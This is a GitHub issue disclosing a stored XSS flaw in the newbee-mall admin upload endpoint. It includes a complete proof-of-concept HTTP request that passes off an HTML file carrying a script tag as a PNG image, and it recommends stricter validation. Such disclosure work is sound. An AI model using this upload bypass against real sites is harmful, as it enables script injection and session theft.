Skip to content

PDF XSS Vulnerability in /upload/files of newbee-mall #99

New issue
New issue
Open
Open
PDF XSS Vulnerability in /upload/files of newbee-mall#99
@ez-lbz

Description

@ez-lbz
ez-lbz
opened on Sep 3, 2025

PDF XSS Vulnerability in /upload/files of newbee-mall

Summary

In newbee-mall, the /upload/files endpoint is vulnerable to PDF-based cross-site scripting (XSS). This vulnerability is similar to CVE-2025-4259, which arises from insufficient validation of uploaded file types. However, while CVE-2025-4259 occurs in the /upload/file route, this issue is present in /upload/files.

Exploitation

Send a crafted upload request using Yakit to the /upload/files endpoint.

POST /admin/upload/files HTTP/1.1
Host: 127.0.0.1:28089
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVhv77D8bkWJbZjNQ
Origin: http://127.0.0.1:28089
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: iframe
Upgrade-Insecure-Requests: 1
Cookie: JSESSIONID=6C4975A8A36CAD2F1A5288233A2F4102
sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Mode: navigate
Referer: http://127.0.0.1:28089/admin/carousels
Content-Length: 404

------WebKitFormBoundaryVhv77D8bkWJbZjNQ
Content-Disposition: form-data; name="file"; filename="white.html"
Content-Type: image/png

{{unquote("\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90wS\xde\x00\x00\x00\x0cIDATx\x9cc\xf8\xff\xff?\x00\x05\xfe\x02\xfe\x0d\xefF\xb8\x00\x00\x00\x00IEND\xaeB`\x82")}}
<script>alert('test')</script>
------WebKitFormBoundaryVhv77D8bkWJbZjNQ--

Access the uploaded file, which successfully triggers PDF XSS.

Image

Impact

  • Persistent execution of attacker-controlled scripts when a malicious PDF is opened in the browser

  • Theft of sensitive user data such as cookies or session tokens

  • Execution of unauthorized actions in the user’s context

Remediation

Enforce strict validation of uploaded file extensions and MIME types to prevent malicious files from being accepted.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions